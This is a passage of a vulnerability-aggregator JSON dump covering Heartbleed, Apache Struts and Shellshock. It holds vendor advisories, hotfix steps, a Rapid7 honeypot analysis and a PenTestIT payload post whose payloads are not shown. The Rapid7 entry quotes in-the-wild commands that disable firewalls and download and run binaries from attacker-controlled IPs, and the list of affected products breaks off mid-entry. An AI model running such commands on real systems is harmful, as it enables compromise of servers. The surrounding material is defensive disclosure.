1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:48", "bulletinFamily": "software", "description": "# \n\n# **Severity**\n\nAdvisory/Critical\n\n# **Vendor**\n\nApache\n\n# **Versions Affected**\n\n * Apache Struts 2:\n * 2.3.x versions prior to 2.3.32\n * 2.5.x versions prior to 2.5.10.1\n\n# **Description**\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 [1] mishandles file upload, which allows remote attackers to execute arbitrary commands via a `#cmd=` string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017 [2].\n\n# **Affected Cloud Foundry Products and Versions**\n\n * The Cloud Foundry team has determined that core releases do not package Apache Struts.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [3].\n\n# **Mitigation**\n\n * The Cloud Foundry team has determined that the project is not exposed to this particular vulnerability and therefore does not require any Cloud Foundry-specific upgrades.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [3].\n\n# **Credit**\n\nNike Zheng\n\n# **References**\n\n * [1] [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)\n * [2] [https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/](<https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/>)\n * [3] [https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&amp;isappinstalled=0](<https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&isappinstalled=0>)\n", "modified": "2017-03-14T00:00:00", "published": "2017-03-14T00:00:00", "id": "CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "href": "https://www.cloudfoundry.org/blog/cve-2017-5638/", "title": "CVE-2017-5638: Apache Struts Remote Code Execution | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "software", "description": "CVE-2014-6271 and CVE-2014-7169 \u2013 ShellShock\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu, CentOS\n\n# Versions Affected\n\n * Canonical Ubuntu 10.04 LTS that include bash \n * CentOS 6.5 that include bash \n\n# Description\n\nGNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nThe Cloud Foundry project is in the process of checking if Cloud Foundry are vulnerable to remote code execution or other exploits. No exploits have been identified or confirmed yet. The Cloud Foundry project is patching all components that have packaged the vulnerable version of bash.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells prior to 2719.1 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry runtime prior to v186 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry BOSH stemcells prior to 2719.2 have bash executables vulnerable to CVE-2014-7169 \n * All versions of Cloud Foundry runtime v186 and prior have bash executables vulnerable to CVE-2014-7169 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v183 or earlier upgrade to v186 or later and BOSH stemcells 2719.1 or later, which contains the patched version of bash that resolves CVE-2014-6271. \n * The Cloud Foundry Project recommends that BOSH deployments running BOSH stemcells 2719.1 and prior upgrade to BOSH stemcell 2719.2 and higher which contains the patched version of bash that resolves CVE-2014-6271 and CVE-2014-7169. \n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v186 and prior upgrade to Release v187 or later. \n\n# Credit\n\nStephane Chazelas (CVE-2014-6271) and Huzaifa S. Sidhpurwala (CVE-2014-7169)\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n\n# History\n\n2014-Sep-25: Initial vulnerability report published.\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "href": "https://www.cloudfoundry.org/blog/cve-2014-6271-and-cve-2014-7169/", "title": "CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "bulletinFamily": "software", "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta.", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/vulnerabilities.html", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-0160)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "atlassian": [{"lastseen": "2019-05-29T17:29:00", "bulletinFamily": "software", "description": "*Description*\r\n Crowd used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute\u00a0Java code of their choice on systems that have a vulnerable version of Crowd.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd\u00a0*from 2.8.3* before *2.9.7* (the fixed version for 2.9.x), from version *2.10.1* before *2.10.3* (the fixed version for 2.10.x) and from version *2.11.0*\u00a0before *2.11.1*\u00a0(the fixed version for 2.11.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Crowd* 2.11.1 is available for download from [https://www.atlassian.com/software/crowd/download].\r\n * *Crowd* 2.10.3 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n * *Crowd* 2.9.7 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n\r\n\u00a0*Hotfix:*\r\nThe preferred fix is to upgrade Crowd to a version that's not vulnerable (see the *Fix* section). If you cannot schedule an upgrade immediately, and are using Crowd 2.10 or 2.11, you can replace the affected library as a temporary workaround.\r\n\r\nTo replace the library:\r\n# Stop Crowd\r\n# Download [struts2-core-2.3.32.jar|https://maven.atlassian.com/content/groups/public/org/apache/struts/struts2-core/2.3.32/struts2-core-2.3.32.jar]\r\n# Remove all existing copies of struts2-core-2.3.29.jar:\r\n{code}\r\n./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n{code}\r\n# Copy the downloaded struts2-core-2.3.32.jar into each of the lib/ directories you removed the jar from\r\n# Restart Crowd\r\n\r\nThis temporary solution is provided only for your convenience and an upgrade to an official Crowd release should be scheduled as soon as possible.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html].", "modified": "2018-10-24T05:01:02", "published": "2017-03-10T04:31:09", "id": "ATLASSIAN:CWD-4879", "href": "https://jira.atlassian.com/browse/CWD-4879", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T13:36:44", "bulletinFamily": "software", "description": "*Description*\r\n\r\nBamboo used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo\r\n\r\n*Affected versions:*\r\n * All versions of Bamboo\u00a0from *5.1.0*\u00a0before *5.14.5*\u00a0(the fixed version for 5.14.x) and from *5.15.0* but less than *5.15.3* (the fixed version for\u00a05.15.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Bamboo*\u00a05.15.3 is available for download from [https://www.atlassian.com/software/bamboo/download].\r\n * *Bamboo*\u00a05.14.5 is available for download from [https://www.atlassian.com/software/bamboo/download-archives].\r\n\r\n*Hotfix:*\r\n The preferred fix is to upgrade your Bamboo using one of the links from the *Fix* section. If you cannot schedule an upgrade immediately, you can replace the affected library as a temporary workaround.\r\n * *Bamboo* 5.9.x, 5.10.x, 5.11.x, 5.12.x - use\u00a0[^struts2-core-2.3.16.3-atlassian-7.jar]\r\n * *Bamboo* 5.13.x - use\u00a0[^struts2-core-2.5.1-atlassian-11.jar] (this jar has struts2 version 2.5.1 with the same fix applied in version 2.5.10.1)\r\n\r\nTo replace the library, remove the existing struts2-core library from $BAMBOO_DIR/WEB-INF/lib, replace it with one matching your Bamboo version and restart your Bamboo server. This temporary solution is provided only for your convenience and an upgrade to an official Bamboo release should be scheduled as soon as possible.\r\n\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/_slDN].", "modified": "2019-08-19T02:05:22", "published": "2017-03-10T04:57:51", "id": "ATLASSIAN:BAM-18242", "href": "https://jira.atlassian.com/browse/BAM-18242", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7community": [{"lastseen": "2017-05-01T16:52:25", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:3e608aa9-c88a-489c-8085-874b64b44140] --><div class=\"jive-rendered-content\"><p><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\">UPDATE - March 10th, 2017: Rapid7 added <span style=\"font-size: 16px; font-family: arial, helvetica, 'helvetica neue', verdana, sans-serif;\">a check that works in conjunction with Nexpose&#8217;s web spider functionality. This check will </span><span style=\"font-size: 16px; font-family: arial, helvetica, 'helvetica neue', verdana, sans-serif;\">be </span><span style=\"font-size: 16px; font-family: arial, helvetica, 'helvetica neue', verdana, sans-serif;\">performed against any URIs discovered with the suffix &ldquo;.action&#8221; (the default configuration for Apache Struts apps). To learn more about using this check, read this <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7823\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/03/15/using-web-spider-to-detect-vulnerable-apache-struts-apps-cve-2017-5638\">post</a>.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\">UPDATE - March 9th, 2017:&#160; <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2Fdownload%2Fenterprise%2F\" target=\"_blank\">Scan your network for this vulnerability</a> with check id apache-struts-cve-2017-5638, which was added to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Nexpose</a> in content update 437200607.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Attacks spotted in the wild</h2><p>Yesterday, Cisco Talos published a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fblog.talosintelligence.com%2F2017%2F03%2Fapache-0-day-exploited.html\" rel=\"nofollow\" target=\"_blank\">blog post</a> indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, <span style=\"font-size: 10.5pt; color: #333333; background: white;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fcwiki.apache.org%2Fconfluence%2Fdisplay%2FWW%2FS2-045\" rel=\"nofollow\" target=\"_blank\">CVE-2017-5638</a></span>, permits <strong>unauthenticated</strong> Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.&#160; When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>World Wide Window into the Web</h2><p>For some time now Rapid7 has been running a research effort called <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7701\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2016/11/02/cross-cloud-adversary-analytics\">Heisenberg Cloud</a>. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. If in the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Spreading malware</h2><p>We use Logentries to query our Heisenberg data and extract meaningful information.&#160; One of the aspects of the attacks is how the malicious traffic has changed over the recent days.&#160; The graph below shows a 72 hour window in time.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7817-65881/pastedImage_1.png\"><img class=\"image-1 jive-image\" height=\"730\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7817-65881/pastedImage_1.png\" style=\"width: 620px; height: 516px; margin-left: auto; margin-right: auto; display: block;\" width=\"877\"/></a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for <strong>/index.aciton</strong> (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><!--[CodeBlockStart:359f8c67-72cf-4d20-9cb9-88c4b03c8ab9][excluded]--><pre class=\"xml\" name=\"code\">cd /dev/shm;\nwget http://XXX.XXX.XXX.92:92/lmydess;\nchmod 777 lmydess;\n./lmydess;\n</pre><!--[CodeBlockEnd:359f8c67-72cf-4d20-9cb9-88c4b03c8ab9]--><div style=\"display:none;\"></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically, move to some place writeable, download code, make sure its executable, and run it.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><!--[CodeBlockStart:097cbbcb-fbdb-4674-a1df-8c4cf4cad477][excluded]--><pre class=\"plain\" name=\"code\">/etc/init.d/iptables stop;\nservice iptables stop;\nSuSEfirewall2 stop;\nreSuSEfirewall2 stop;\ncd /tmp;\nwget -c http://XXX.XXX.XXX.26:9/7;\nchmod 777 7;\n./7;\n</pre><!--[CodeBlockEnd:097cbbcb-fbdb-4674-a1df-8c4cf4cad477]--><div style=\"display:none;\"></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>This is similar to the prior commands but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.virustotal.com%2Fen%2Ffile%2F98bd48f1574a891b5ae8dff726671255e10b4b30c2f562f3edc5f6f89f35804d%2Fanalysis%2F\" rel=\"nofollow\" target=\"_blank\">capture a sample</a>.&#160; It appears to be a variant of the XOR DDoS family.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Not so innocent</h2><p>Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run \"harmless\" commands such as <strong>whois</strong>, <strong>ifconfig</strong>, and a couple variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet or an information gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>A little sunshine</h2><p>Based on the traffic we are seeing <strong>at this time</strong> it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts this would be a great time to review Apache's <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fcwiki.apache.org%2Fconfluence%2Fdisplay%2FWW%2FS2-045\" rel=\"nofollow\" target=\"_blank\">documentation</a> on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Good luck!</p></div><!-- [DocumentBodyEnd:3e608aa9-c88a-489c-8085-874b64b44140] -->", "modified": "2017-03-15T14:29:55", "published": "2017-03-15T14:29:55", "href": "https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild", "id": "RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD", "title": "Apache Struts Vulnerability (CVE-2017-5638) Exploit Traffic", "type": "rapid7community", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestit": [{"lastseen": "2017-09-07T06:14:05", "bulletinFamily": "blog", "description": "PenTestIT RSS Feed\n\nThere is a saying making rounds now that \"Apache Struts is like the WebGoat of all frameworks\" and the current exploit which is being tracked under **CVE-2017-9805** and the Apache Struts bulletin - [S2-052](<https://cwiki.apache.org/confluence/display/WW/S2-052>) prooves just that. If you remember, I had covered another vulnerability a couple of months ago - which is tracked under [S2-048](<http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/>) &amp; CVE-2017-9791.\n\n\n\n## What is the Apache Struts2 CVE-2017-9805 vulnerability about?\n\nThe original advisory [**here**](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) mentions the vulnerability briefly. However, the Apache Foundation description was enough for people to create a PoC even before the discoverer could make these details public. Interestingly, the original advisory has been updated to mention this - \"_Updated on 6 September: added a warning regarding multiple working exploits having been published by third parties.\"_ The vendor advisory states this - \"_The REST Plugin is using a `XStreamHandler` with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when de-serializing XML payloads._\"\n\nI will not go into the details about how do you exploit this vulnerability, as I tweeted about the PoC availability yesterday itself:\n\n> CVE-2017-9805, <https://t.co/doP89huIGN> (S2-052) POC - <https://t.co/ZwTMWmTY1A>\n> \n> -- Pentestit (@pentestit) [September 5, 2017](<https://twitter.com/pentestit/status/905214097246978052>)\n\nThe PoC there works good and kudos to the author! This post tries to list down a few more payloads that I could think will be interesting to use. Without further ado, we begin with the different payloads:\n\nCVE-2017-9805 payload for a reverse connection via MSTSC (Terminal Server Connection):\n\n\n\nThis has a high success rate on Windows systems which can \"connect back\" to you.\n\nCVE-2017-9805 payload for file download no execution (figure that part out): \n \nShould work on almost all Microsoft Windows systems as long as Tomcat has the right privileges set. \nCVE-2017-9805 payload for file download on a Linux machine: \n \nThis should also work on a good amount of systems that has cURL.\n\n## Fix CVE-2017-9805:\n\nAs the Apache Foundation suggests, the first option is to upgrade to [Struts 2.5.13](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13>) or [Struts 2.3.34](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34>). Secondly, you can upgrade the plugin by uploading all the required plugin JARs and it's dependencies.\n\nThe post [S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)](<http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-09-07T05:33:35", "published": "2017-09-07T05:33:35", "href": "http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/", "id": "PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "title": "S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)", "type": "pentestit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "symantec": [{"lastseen": "2018-03-12T10:28:36", "bulletinFamily": "software", "description": "### Description\n\nGNU Bash is prone to remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Advantech EKI-1320 1.98 \n * Advantech EKI-1320 \n * Alcatel-Lucent QIP \n * Apple Mac OS X 10.0.0 3 \n * Apple Mac OS X 10.0.0 \n * Apple Mac OS X 10.0.1 \n * Apple Mac OS X 10.0.2 \n * Apple Mac OS X 10.0.3 \n * Apple Mac OS X 10.0.4 \n * Apple Mac OS X 10.1.0 \n * Apple Mac OS X 10.1.1 \n * Apple Mac OS X 10.1.2 \n * Apple Mac OS X 10.1.3 \n * Apple Mac OS X 10.1.4 \n * Apple Mac OS X 10.1.5 \n * Apple Mac OS X 10.2.0 \n * Apple Mac OS X 10.2.1 \n * Apple Mac OS X 10.2.2 \n * Apple Mac OS X 10.2.3 \n * Apple Mac OS X 10.2.4 \n * Apple Mac OS X 10.2.5 \n * Apple Mac OS X 10.2.6 \n * Apple Mac OS X 10.2.7 \n * Apple Mac OS X 10.2.8 \n * Apple Mac OS X 10.3.0 \n * Apple Mac OS X 10.3.1 \n * Apple Mac OS X 10.3.2 \n * Apple Mac OS X 10.3.3 \n * Apple Mac OS X 10.3.4 \n * Apple Mac OS X 10.3.5 \n * Apple Mac OS X 10.3.6 \n * Apple Mac OS X 10.3.7 \n * Apple Mac OS X 10.3.8 \n * Apple Mac OS X 10.3.9 \n * Apple Mac OS X 10.4.0 \n * Apple Mac OS X 10.4.1 \n * Apple Mac OS X 10.4.10 \n * Apple Mac OS X 10.4.11 \n * Apple Mac OS X 10.4.2 \n * Apple Mac OS X 10.4.3 \n * Apple Mac OS X 10.4.4 \n * Apple Mac OS X 10.4.5 \n * Apple Mac OS X 10.4.6 \n * Apple Mac OS X 10.4.7 \n * Apple Mac OS X 10.4.8 \n * Apple Mac OS X 10.4.9 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6 Update 12 \n * Apple Mac OS X 10.6 Update 14 \n * Apple Mac OS X 10.6 Update 17 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.0 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.0 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X 10.8.3 \n * Apple Mac OS X 10.8.4 \n * Apple Mac OS X 10.8.5 \n * Apple Mac OS X 10.8.5 Supplemental Update \n * Apple Mac OS X 10.9 \n * Apple Mac OS X 10.9.1 \n * Apple Mac OS X 10.9.2 \n * Apple Mac OS X 10.9.3 \n * Apple Mac OS X 10.9.4 \n * Apple Mac OS X 10.9.5 \n * Apple Mac OS X Server 10.7.5 \n * Appneta Pathview \n * Arista Networks EOS 4.14 \n * Arista Networks EOS 4.9 \n * Avaya 96x1 IP Deskphone 6 \n * Avaya 96x1 IP Deskphone 6.2 \n * Avaya 96x1 IP Deskphone 6.3 \n * Avaya 96x1 IP Deskphones 6.0 \n * Avaya 96x1 IP Deskphones 6.2 \n * Avaya ADS virtual app 2.0 \n * Avaya Aura Application Enablement Services 5.0 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.0 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Enablement Services 6.3 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB16 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB19 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB23 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB25 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB26 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB28 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB3 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB5 \n * Avaya Aura Collaboration Environment 2.0 \n * Avaya Aura Collaboration Environment 3.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP4 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 5.2.1 SSP1 \n * Avaya Aura Communication Manager 5.2.1 SSP2 \n * Avaya Aura Communication Manager 5.2.1 SSP3 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager 6.3 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager 